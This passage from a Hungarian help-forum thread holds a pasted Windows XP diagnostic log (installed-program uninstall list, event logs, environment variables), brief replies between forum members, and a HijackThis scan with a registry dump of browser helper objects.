Adobe Type Support-->MsiExec.exe /I{8E6808E2-613D-4FCD-81A2-6C8FA8E03312}
Adobe Update Manager CS3-->MsiExec.exe /I{E69AE897-9E0B-485C-8552-7841F48D42D8}
Adobe Version Cue CS3 Client-->MsiExec.exe /I{D0DFF92A-492E-4C40-B862-A74A173C25C5}
Adobe WinSoft Linguistics Plugin-->MsiExec.exe /I{184CE391-7E0E-4C63-9935-D7A10EDFD3C6}
Adobe XMP Panels CS3-->MsiExec.exe /I{D5A31AB1-345D-47C7-A87B-036A669F6DF1}
AMCap-->C:\Program Files\Noel Danjou\AMCap\uninst.exe
Any Video Converter 2.6.7-->"C:\Program Files\Any Video Converter\unins000.exe"
BASCOM-AVR-->"C:\Program Files\MCS Electronics\BASCOM-AVR 1.11.9.1\unins000.exe"
Call of Duty(R) 4 - Modern Warfare(TM) 1.6 Patch-->C:\Program Files\InstallShield Installation Information\{8A15B7D9-908A-4EF9-BA84-5AEDE61743EE}\setup.exe -runfromtemp -l0x0409
Call of Duty(R) 4 - Modern Warfare(TM) 1.7 Patch-->C:\Program Files\InstallShield Installation Information\{931C37FC-594D-43A9-B10F-A2F2B1F03498}\setup.exe -runfromtemp -l0x0409
Call of Duty(R) 4 - Modern Warfare(TM)-->C:\Program Files\InstallShield Installation Information\{E48469CC-635E-4FD5-A122-1497C286D217}\setup.exe -runfromtemp -l0x0409
CCleaner (remove only)-->"C:\Program Files\CCleaner\uninst.exe"
DivX-->C:\Program Files\DivX\DivXCodecUninstall.exe /CODEC
EAGLE 5.3.0-->cmd.exe /c start "EAGLE Uninstaller" /min "C:\Program Files\EAGLE-5.3.0\bin\uninstall.bat" C:\Program Files\EAGLE-5.3.0\bin
ESET NOD32 Antivirus-->MsiExec.exe /I{9361BBAC-B475-4E74-9D7E-9C3FBEB8B3AF}
Fujitsu Siemens Computers WLAN 802.11b/g D1705/D1706-->C:\WINDOWS\system32\unwlsdrv.exe SiS163u
Grand Theft Auto IV-->"C:\Program Files\InstallShield Installation Information\{579BA58C-F33D-4970-9953-B94B43768AC3}\setup.exe" -runfromtemp -l0x0009 -removeonly
Grand Theft Auto: San Andreas hun [Honosítás]-->C:\WINDOWS\Grand Theft Auto_ San Andreas hun Uninstaller.exe
GTA San Andreas-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}\setup.exe" -l0x9 -removeonly
Guitar Pro 5.2-->"C:\Program Files\Guitar Pro 5\unins000.exe"
HD Tune 2.55-->"C:\Program Files\HD Tune\unins000.exe"
HijackThis 2.0.2-->"C:\Documents and Settings\Bence\Dokumentumok\Programok telepítője\HijackThis.exe" /uninstall
Hotfix for Windows Media Format SDK (KB902344)-->"C:\WINDOWS\$NtUninstallKB902344$\spuninst\spuninst.exe"
HP Document Viewer 7.0-->C:\Program Files\HP\Digital Imaging\DocumentViewer\hpzscr01.exe -datfile hpqbud04.dat
HP Photosmart, Officejet and Deskjet 7.0.A-->C:\Program Files\HP\Digital Imaging\{BDBE2F3E-42DB-4d4a-8CB1-19BA765DBC6C}\setup\hpzscr01.exe -datfile hposcr11.dat
InCD-->C:\WINDOWS\NuNInst.exe /UNINSTALL
InterVideo WinDVD-->"C:\Program Files\InstallShield Installation Information\{91810AFC-A4F8-4EBA-A5AA-B198BBC81144}\setup.exe" REMOVEALL
J2SE Runtime Environment 5.0 Update 6-->MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0150060}
Java(TM) 6 Update 11-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216011FF}
KFWS-->C:\Program Files\KeyFocus\KFWS\Uninstall.exe "C:\Program Files\KeyFocus\KFWS\install.log"
LCDcenter-->C:\WINDOWS\st6unst.exe -n "C:\Program Files\LCDcenter\ST6UNST.LOG"
LimeWire 4.18.6-->"C:\Program Files\LimeWire\uninstall.exe"
Messenger Plus! Live-->"C:\Program Files\Messenger Plus! Live\Uninstall.exe"
Microsoft .NET Framework 1.1 Hotfix (KB886903)-->"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\hotfix.exe" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\M886903\M886903Uninstall.msp"
Microsoft .NET Framework 1.1 Hungarian Language Pack-->MsiExec.exe /X{8FC113D5-64A6-40EE-9A39-DAB4650457A8}
Microsoft .NET Framework 1.1-->msiexec.exe /X {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
Microsoft .NET Framework 1.1-->MsiExec.exe /X{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
Microsoft .NET Framework 2.0-->C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0\install.exe
Microsoft .NET Framework 3.0-->c:\WINDOWS\Microsoft.NET\Framework\v3.0\Microsoft .NET Framework 3.0\setup.exe
Microsoft .NET Framework 3.0-->MsiExec.exe /X{15095BF3-A3D7-4DDF-B193-3A496881E003}
Microsoft Games for Windows - LIVE -->MsiExec.exe /X{4AA3D64E-9EC3-4B0F-AB91-5885AC55641F}
Microsoft Games for Windows - LIVE Redistributable-->MsiExec.exe /X{FD052FB9-FE90-4438-B355-15EDC89D8FB1}
Microsoft Kernel-Mode Driver Framework Feature Pack 1.7-->"C:\WINDOWS\$NtUninstallWdf01007$\spuninst\spuninst.exe"
Microsoft MSDN 2005 Express Edition - ENU-->C:\Program Files\Microsoft Visual Studio 8\Microsoft MSDN 2005 Express Edition - ENU\install.exe
Microsoft Office XP Professional és FrontPage-->MsiExec.exe /I{9028040E-6000-11D3-8CFE-0050048383C9}
Microsoft SQL Server Desktop Engine (PINNACLESYS)-->MsiExec.exe /X{E09B48B5-E141-427A-AB0C-D3605127224A}
Microsoft User-Mode Driver Framework Feature Pack 1.0-->"C:\WINDOWS\$NtUninstallWudf01000$\spuninst\spuninst.exe"
Microsoft Virtual PC 2007-->MsiExec.exe /X{8A7CAA24-7B23-410B-A7C3-F994B0944160}
Microsoft Visual Basic 2005 Express Edition - ENU-->C:\Program Files\Microsoft Visual Studio 8\Microsoft Visual Basic 2005 Express Edition - ENU\setup.exe
Microsoft Visual Basic 2005 Express Edition - ENU-->MsiExec.exe /X{577AD794-8B34-40B4-9E7A-BE4CFFE396E6}
Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{7299052b-02a4-4627-81f2-1818da5d550d}
MSXML 4.0 SP2 Parser and SDK-->MsiExec.exe /I{716E0306-8318-4364-8B8F-0CC4E9376BAC}
MSXML 6.0 Parser (KB927977)-->MsiExec.exe /I{5A710547-B58E-488B-828D-CA9A25A0533C}
Nero Suite-->C:\Program Files\Common Files\Nero\Uninstall\Setupx.exe /uninstall ExtraUninstallID=""
NTREGOPT 1.1j-->"C:\Program Files\NT Registry Optimizer\unins000.exe"
NVIDIA Drivers-->C:\WINDOWS\system32\nvuninst.exe UninstallGUI
OpenMG Limited Patch 4.7-07-14-05-01-->C:\Program Files\Common Files\Sony Shared\OpenMG\HotFixes\HotFix4.7-07-14-05-01\HotFixSetup\setup.exe /u
OpenMG Secure Module 4.7.00-->C:\PROGRA~1\COMMON~1\INSTAL~1\Driver\1150\INTEL3~1\IDriver.exe /M{CCD663AE-610D-4BDF-AAB0-E914B044527D} UNINSTALL
Opera 9.63-->MsiExec.exe /X{1BC4026B-1957-4514-9058-2B542557F143}
PDF Settings-->MsiExec.exe /I{293D5729-7C01-4FA4-A4DE-BB6A1587BBB9}
Pinnacle MediaCenter-->"C:\Program Files\InstallShield Installation Information\{F38ADCA4-AF7C-4C73-9021-6F1EA15D15EA}\Setup.exe"UNINSTALL /l0x000e
Pinnacle MediaServer-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{460CE8B9-6EC2-458A-90D4-691631ECE9D9}\setup.exe" -l0xe UNINSTALL
PonyProg2000 v2.07c-->"C:\Program Files\PonyProg2000\unins000.exe"
QuickTime-->MsiExec.exe /I{5B09BD67-4C99-46A1-8161-B7208CE18121}
Realtek High Definition Audio Driver-->RtlUpd.exe -r -m
Rockstar Games Social Club-->"C:\Program Files\InstallShield Installation Information\{08B3869E-D282-424C-9AFC-870E04A4BA14}\setup.exe" -runfromtemp -l0x0009 -removeonly
SonicStage 4.3-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\10\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{A0EB195B-5876-48E6-879D-33D4B2102610}\setup.exe" -l0x9 UNINSTALL -removeonly
Sony Ericsson Media Manager 1.1-->MsiExec.exe /X{2E0C4E9E-6ED1-4F86-A4C6-D0D84B77B29E}
Sothink SWF Decompiler-->"C:\Program Files\SourceTec\Sothink SWF Decompiler\unins000.exe"
Star Wars Jedi Knight Jedi Academy-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}\Setup.exe" -l0x9
SystemDiagnostics-->MsiExec.exe /X{2F04C9DA-94DA-4361-8B34-02CD8187861F}
Total Commander (Remove or Repair)-->C:\Program Files\Totalcmd\tcuninst.exe
VC 9.0 Runtime-->MsiExec.exe /I{A040AC77-C1AA-4CC9-8931-9F648AF178F6}
VIA Rhine-Family Fast Ethernet Adapter-->Rundll32.exe vuins32.dll,vuins32Ex $Rhine $VIA
Virtual DJ - Atomix Productions-->C:\PROGRA~1\VIRTUA~1\UNWISE.EXE C:\PROGRA~1\VIRTUA~1\INSTALL.LOG
VLC media player 0.9.8a-->C:\Program Files\VideoLAN\VLC\uninstall.exe
WavePad Uninstall-->C:\Program Files\NCH Swift Sound\WavePad\uninst.exe
webcamXP 2007-->"C:\Program Files\webcamXP\wxp-uninst.exe"
web'n'walk Manager-->MsiExec.exe /X{2FA7D8E9-D3C0-4E62-BD8E-60BD598D1835}
Windows Communication Foundation-->MsiExec.exe /X{491DD792-AD81-429C-9EB4-86DD3D22E333}
Windows Live installer-->MsiExec.exe /X{999CE3F5-C179-4607-BEDF-B9544B0DD232}
Windows Live Messenger-->MsiExec.exe /X{AF2815A6-0573-45A4-BAE3-3194C1D4393C}
Windows Media Format 11 runtime-->"C:\WINDOWS\$NtUninstallWMFDist11$\spuninst\spuninst.exe"
Windows Media Format Runtime-->"C:\Program Files\Windows Media Player\wmsetsdk.exe" /UninstallAll
Windows Media Format SDK Hotfix - KB891122-->"C:\WINDOWS\$NtUninstallKB891122$\spuninst\spuninst.exe"
Windows Media Player 10 Biztonsági frissítés (KB917734)-->"C:\WINDOWS\$NtUninstallKB917734_WMP10$\spuninst\spuninst.exe"
Windows Media Player 10 Hotfix - KB888656-->"C:\WINDOWS\$NtUninstallKB888656$\spuninst\spuninst.exe"
Windows Media Player 10-->"C:\Program Files\Windows Media Player\Setup_wm.exe" /Uninstall
Windows Media Player Firefox Plugin-->MsiExec.exe /I{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}
Windows Presentation Foundation-->MsiExec.exe /X{BAF78226-3200-4DB4-BE33-4D922A799840}
Windows Workflow Foundation-->MsiExec.exe /I{7D1B85BD-AA07-48B8-808D-67A4067FC6BD}
Windows XP Service Pack 3-->"C:\WINDOWS\$NtServicePackUninstall$\spuninst\spuninst.exe"
Yamaha UW10 drivers-->C:\WINDOWS\usb-audio.de\SETUP.exe /u /iYAMAHA_UW10 /rusb-audio.deYAMAHA_UW10
ZoneAlarm Spy Blocker-->rundll32 C:\PROGRA~1\ZONEAL~1\bar\1.bin\SpyBlock.dll,O
ZoneAlarm-->C:\Program Files\Zone Labs\ZoneAlarm\zauninst.exe

======Security center information======

AV: ESET NOD32 Antivirus 3.0
FW: ZoneAlarm Firewall

======System event log======

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20717
Source Name: PlugPlayManager
Time Written: 20090514142243.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20716
Source Name: PlugPlayManager
Time Written: 20090514142243.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20715
Source Name: PlugPlayManager
Time Written: 20090514142243.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20714
Source Name: PlugPlayManager
Time Written: 20090514142242.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20713
Source Name: PlugPlayManager
Time Written: 20090514142242.000000+120
Event Type: figyelmeztetés
User:

=====Application event log=====

Computer Name: BEZSO
Event Code: 103
Message: MsnMsgr (1016) \\.\C:\Documents and Settings\Bence\Local Settings\Application Data\Microsoft\Messenger\s.bence@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor leállított egy példányt: 0.

Record Number: 5922
Source Name: ESENT
Time Written: 20090419220231.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 102
Message: MsnMsgr (1016) \\.\C:\Documents and Settings\Bence\Local Settings\Application Data\Microsoft\Messenger\s.bence@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor új példányt indított el: 0.

Record Number: 5921
Source Name: ESENT
Time Written: 20090419212531.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 100
Message: MsnMsgr (1016) A(z) 5.01.2600.5512 adatbázismotor elindult.

Record Number: 5920
Source Name: ESENT
Time Written: 20090419212531.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 302
Message: msnmsgr (1888) \\.\C:\Documents and Settings\Zsombor\Local Settings\Application Data\Microsoft\Messenger\zsombor@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor sikeresen befejezte a helyreállítás lépéseit.

Record Number: 5919
Source Name: ESENT
Time Written: 20090419200408.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 301
Message: msnmsgr (1888) \\.\C:\Documents and Settings\Zsombor\Local Settings\Application Data\Microsoft\Messenger\zsombor@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor újra lejátssza a következő naplófájlt: \\.\C:\Documents and Settings\Zsombor\Local Settings\Application Data\Microsoft\Messenger\zsombor@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\fsr.log.

Record Number: 5918
Source Name: ESENT
Time Written: 20090419200408.000000+120
Event Type: információ
User:

======Environment variables======

"ComSpec"=%SystemRoot%\system32\cmd.exe
"Path"=%systemroot%\system32;%systemroot%;%systemroot%\system32\wbem;C:\Program Files\Microsoft SQL Server\80\Tools\Binn;C:\Program Files\QuickTime\QTSystem
"windir"=%SystemRoot%
"FP_NO_HOST_CHECK"=NO
"OS"=Windows_NT
"PROCESSOR_ARCHITECTURE"=x86
"PROCESSOR_LEVEL"=6
"PROCESSOR_IDENTIFIER"=x86 Family 6 Model 15 Stepping 6, GenuineIntel
"PROCESSOR_REVISION"=0f06
"NUMBER_OF_PROCESSORS"=2
"PATHEXT"=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
"TEMP"=%SystemRoot%\TEMP
"TMP"=%SystemRoot%\TEMP
"tvdumpflags"=8
"RGSCLauncher"=C:\Program Files\Rockstar Games\Rockstar Games Social Club
"RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_0_0_0
"CLASSPATH"=.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip
"QTJAVA"=C:\Program Files\Java\jre6\lib\ext\QTJava.zip

-----------------EOF-----------------


Sat May 23, 2009 13:40
silver member

Joined: Thu Jun 21, 2007 10:27
Posts: 92
Post
I understand, but there was only log.txt there. But I'll try once more.


Sat May 23, 2009 13:25
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, which is why what you see looks like this,
Post
info.txt >> this will be on the taskbar
Info.txt is minimized down at the bottom, on that thin bar


Sat May 23, 2009 13:08
silver member

Joined: Thu Jun 21, 2007 10:27
Posts: 92
Post
It only produced log.txt:

Logfile of random's system information tool 1.06 (written by random/random)
Run by Zsombor at 2009-05-23 13:53:47
Microsoft Windows XP Home Edition Szervizcsomag 3
System drive C: has 68 GB (45%) free of 153 GB
Total RAM: 3070 MB (85% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:54:42, on 2009.05.23.
Platform: Windows XP Szervizcsomag 3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_1_3_0\RGSC.exe
C:\Documents and Settings\Zsombor\Asztal\RSIT.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\trend micro\Zsombor.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: ZoneAlarm Spy Blocker BHO - {F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: ZoneAlarm Spy Blocker - {F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [RGSC] C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xportálás Microsoft Excel formátumba - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 0564585359
O17 - HKLM\System\CCS\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GtDetectSc - Option - C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Ahead Software AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: KF Web Server (KeyFocusWebServer) - Unknown owner - C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: Pinnacle Systems Media Service (PinnacleSys.MediaServer) - Pinnacle Systems - C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe
O23 - Service: Fujitsu Siemens Computers Diagnostic Testhandler (TestHandler) - Fujitsu Siemens Computers - C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

--
End of file - 8738 bytes

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2009-01-13 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
Adobe PDF Conversion Toolbar Helper - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-01-13 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-01-13 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA}]
ZoneAlarm Spy Blocker BHO - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - ZoneAlarm Spy Blocker - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

